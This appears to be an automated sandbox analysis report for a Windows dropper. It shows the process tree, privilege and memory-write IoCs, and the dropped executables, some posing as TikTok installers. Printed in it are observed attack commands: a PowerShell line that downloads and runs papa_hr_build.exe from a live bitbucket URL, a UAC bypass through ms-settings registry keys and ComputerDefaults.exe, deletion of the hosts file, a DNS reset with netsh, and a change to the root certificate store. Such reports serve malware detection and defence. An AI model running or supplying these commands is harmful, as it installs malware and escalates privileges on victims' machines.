255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 main_v4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 main_v4.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1872 powershell.exe 1872 powershell.exe 2688 powershell.exe 2688 powershell.exe 4892 powershell.exe 4892 powershell.exe 1496 powershell.exe 1496 powershell.exe 4368 powershell.exe 4368 powershell.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe 3840 filer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3232 New Text Document mod.exe Token: SeDebugPrivilege 4372 tasklist.exe Token: SeIncreaseQuotaPrivilege 2512 wmic.exe Token: SeSecurityPrivilege 2512 wmic.exe Token: SeTakeOwnershipPrivilege 2512 wmic.exe Token: SeLoadDriverPrivilege 2512 wmic.exe Token: SeSystemProfilePrivilege 2512 wmic.exe Token: SeSystemtimePrivilege 2512 wmic.exe Token: SeProfSingleProcessPrivilege 2512 wmic.exe Token: SeIncBasePriorityPrivilege 2512 wmic.exe Token: SeCreatePagefilePrivilege 2512 wmic.exe Token: SeBackupPrivilege 2512 wmic.exe Token: SeRestorePrivilege 2512 wmic.exe Token: SeShutdownPrivilege 2512 wmic.exe Token: SeDebugPrivilege 2512 wmic.exe Token: SeSystemEnvironmentPrivilege 2512 wmic.exe Token: SeRemoteShutdownPrivilege 2512 wmic.exe Token: SeUndockPrivilege 2512 wmic.exe Token: SeManageVolumePrivilege 2512 wmic.exe Token: 33 2512 wmic.exe Token: 34 2512 wmic.exe Token: 35 2512 wmic.exe Token: 36 2512 wmic.exe Token: SeIncreaseQuotaPrivilege 2512 wmic.exe Token: SeSecurityPrivilege 2512 wmic.exe Token: SeTakeOwnershipPrivilege 2512 wmic.exe Token: SeLoadDriverPrivilege 2512 wmic.exe Token: SeSystemProfilePrivilege 2512 wmic.exe Token: SeSystemtimePrivilege 2512 wmic.exe Token: SeProfSingleProcessPrivilege 2512 wmic.exe Token: SeIncBasePriorityPrivilege 2512 wmic.exe Token: SeCreatePagefilePrivilege 2512 wmic.exe Token: SeBackupPrivilege 2512 wmic.exe Token: SeRestorePrivilege 2512 wmic.exe Token: SeShutdownPrivilege 2512 wmic.exe Token: SeDebugPrivilege 2512 wmic.exe Token: SeSystemEnvironmentPrivilege 2512 wmic.exe Token: SeRemoteShutdownPrivilege 2512 wmic.exe Token: SeUndockPrivilege 2512 wmic.exe Token: SeManageVolumePrivilege 2512 wmic.exe Token: 33 2512 wmic.exe Token: 34 2512 wmic.exe Token: 35 2512 wmic.exe Token: 36 2512 wmic.exe Token: SeIncreaseQuotaPrivilege 3500 wmic.exe Token: SeSecurityPrivilege 3500 wmic.exe Token: SeTakeOwnershipPrivilege 3500 wmic.exe Token: SeLoadDriverPrivilege 3500 wmic.exe Token: SeSystemProfilePrivilege 3500 wmic.exe Token: SeSystemtimePrivilege 3500 wmic.exe Token: SeProfSingleProcessPrivilege 3500 wmic.exe Token: SeIncBasePriorityPrivilege 3500 wmic.exe Token: SeCreatePagefilePrivilege 3500 wmic.exe Token: SeBackupPrivilege 3500 wmic.exe Token: SeRestorePrivilege 3500 wmic.exe Token: SeShutdownPrivilege 3500 wmic.exe Token: SeDebugPrivilege 3500 wmic.exe Token: SeSystemEnvironmentPrivilege 3500 wmic.exe Token: SeRemoteShutdownPrivilege 3500 wmic.exe Token: SeUndockPrivilege 3500 wmic.exe Token: SeManageVolumePrivilege 3500 wmic.exe Token: 33 3500 wmic.exe Token: 34 3500 wmic.exe Token: 35 3500 wmic.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 4588 AmLzNi.exe 4588 AmLzNi.exe 4588 AmLzNi.exe 1560 Reynolds.com 1560 Reynolds.com 1560 Reynolds.com 1464 explorer.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 4588 AmLzNi.exe 4588 AmLzNi.exe 4588 AmLzNi.exe 1560 Reynolds.com 1560 Reynolds.com 1560 Reynolds.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3600 tik-tok-1.0.5.0-installer_iPXA-F1.exe 3600 tik-tok-1.0.5.0-installer_iPXA-F1.exe 3840 filer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3232 wrote to memory of 3600 3232 New Text Document mod.exe 81 PID 3232 wrote to memory of 3600 3232 New Text Document mod.exe 81 PID 3232 wrote to memory of 3600 3232 New Text Document mod.exe 81 PID 3232 wrote to memory of 2332 3232 New Text Document mod.exe 82 PID 3232 wrote to memory of 2332 3232 New Text Document mod.exe 82 PID 3232 wrote to memory of 2332 3232 New Text Document mod.exe 82 PID 2332 wrote to memory of 4372 2332 main_v4.exe 84 PID 2332 wrote to memory of 4372 2332 main_v4.exe 84 PID 2332 wrote to memory of 4372 2332 main_v4.exe 84 PID 2332 wrote to memory of 2512 2332 main_v4.exe 86 PID 2332 wrote to memory of 2512 2332 main_v4.exe 86 PID 2332 wrote to memory of 2512 2332 main_v4.exe 86 PID 2332 wrote to memory of 3500 2332 main_v4.exe 87 PID 2332 wrote to memory of 3500 2332 main_v4.exe 87 PID 2332 wrote to memory of 3500 2332 main_v4.exe 87 PID 2332 wrote to memory of 1872 2332 main_v4.exe 88 PID 2332 wrote to memory of 1872 2332 main_v4.exe 88 PID 2332 wrote to memory of 1872 2332 main_v4.exe 88 PID 2332 wrote to memory of 2528 2332 main_v4.exe 89 PID 2332 wrote to memory of 2528 2332 main_v4.exe 89 PID 2332 wrote to memory of 2528 2332 main_v4.exe 89 PID 2332 wrote to memory of 2704 2332 main_v4.exe 90 PID 2332 wrote to memory of 2704 2332 main_v4.exe 90 PID 2332 wrote to memory of 2704 2332 main_v4.exe 90 PID 3232 wrote to memory of 3096 3232 New Text Document mod.exe 91 PID 3232 wrote to memory of 3096 3232 New Text Document mod.exe 91 PID 3232 wrote to memory of 3096 3232 New Text Document mod.exe 91 PID 3096 wrote to memory of 2976 3096 TikTok18.exe 92 PID 3096 wrote to memory of 2976 3096 TikTok18.exe 92 PID 3096 wrote to memory of 2976 3096 TikTok18.exe 92 PID 2332 wrote to memory of 5116 2332 main_v4.exe 93 PID 2332 wrote to memory of 5116 2332 main_v4.exe 93 PID 2332 wrote to memory of 5116 2332 main_v4.exe 93 PID 2332 wrote to memory of 4800 2332 main_v4.exe 94 PID 2332 wrote to memory of 4800 2332 main_v4.exe 94 PID 2332 wrote to memory of 4800 2332 main_v4.exe 94 PID 2332 wrote to memory of 1508 2332 main_v4.exe 95 PID 2332 wrote to memory of 1508 2332 main_v4.exe 95 PID 2332 wrote to memory of 1508 2332 main_v4.exe 95 PID 2332 wrote to memory of 1884 2332 main_v4.exe 96 PID 2332 wrote to memory of 1884 2332 main_v4.exe 96 PID 2332 wrote to memory of 1884 2332 main_v4.exe 96 PID 2332 wrote to memory of 4428 2332 main_v4.exe 97 PID 2332 wrote to memory of 4428 2332 main_v4.exe 97 PID 2332 wrote to memory of 4428 2332 main_v4.exe 97 PID 2332 wrote to memory of 932 2332 main_v4.exe 98 PID 2332 wrote to memory of 932 2332 main_v4.exe 98 PID 2332 wrote to memory of 932 2332 main_v4.exe 98 PID 2332 wrote to memory of 2688 2332 main_v4.exe 99 PID 2332 wrote to memory of 2688 2332 main_v4.exe 99 PID 2332 wrote to memory of 2688 2332 main_v4.exe 99 PID 2332 wrote to memory of 4876 2332 main_v4.exe 100 PID 2332 wrote to memory of 4876 2332 main_v4.exe 100 PID 2332 wrote to memory of 4876 2332 main_v4.exe 100 PID 2332 wrote to memory of 5112 2332 main_v4.exe 101 PID 2332 wrote to memory of 5112 2332 main_v4.exe 101 PID 2332 wrote to memory of 5112 2332 main_v4.exe 101 PID 2332 wrote to memory of 3428 2332 main_v4.exe 102 PID 2332 wrote to memory of 3428 2332 main_v4.exe 102 PID 2332 wrote to memory of 3428 2332 main_v4.exe 102 PID 3232 wrote to memory of 3336 3232 New Text Document mod.exe 103 PID 3232 wrote to memory of 3336 3232 New Text Document mod.exe 103 PID 3232 wrote to memory of 3336 3232 New Text Document mod.exe 103 PID 3336 wrote to memory of 4536 3336 papa_hr_build.exe 104
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:560
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1488
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:420
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3400
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1848
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2080
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2532
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2600
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:1344
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3312
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3740
-
-
C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"C:\Users\Admin\AppData\Local\Temp\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3600
-
-
C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"C:\Users\Admin\AppData\Local\Temp\a\main_v4.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1872
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer4⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity4⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name4⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:5116
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵
- System Location Discovery: System Language Discovery
PID:4800
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵
- System Location Discovery: System Language Discovery
PID:1508
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:1884
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version4⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate4⤵
- System Location Discovery: System Language Discovery
PID:932
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2688
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer4⤵
- System Location Discovery: System Language Discovery
PID:4876
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity4⤵
- System Location Discovery: System Language Discovery
PID:5112
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name4⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3428
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵
- System Location Discovery: System Language Discovery
PID:3612
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵
- System Location Discovery: System Language Discovery
PID:1008
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\e581604\TikTok18.exerun=1 shortcut="C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2976 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c .\TikTok18.bat5⤵
- System Location Discovery: System Language Discovery
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe', 'C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe')";6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4892
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe;6⤵
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exeC:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe ;7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"C:\Users\Admin\AppData\Local\Temp\papa_hr_build.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 3008⤵
- Program crash
PID:4868
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"C:\Users\Admin\AppData\Local\Temp\a\papa_hr_build.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3336 -s 3004⤵
- Program crash
PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"3⤵
- Executes dropped EXE
PID:4948 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:2392
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2998.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2998.vbs" /f5⤵
- Modifies registry class
PID:3872
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3016
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:2484
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:3908
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\2998.vbs6⤵PID:4736
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:3416
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\2998.vbs4⤵PID:2864
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3300
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4748
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4588
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2432
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2510.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:1516
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2510.vbs" /f5⤵
- Modifies registry class
PID:1420
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4568
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:1084
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:2512
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\2510.vbs6⤵PID:4864
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp7⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4396
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\2510.vbs4⤵PID:4236
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1872
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:5056
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3140
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4084
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4911.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:2256
-
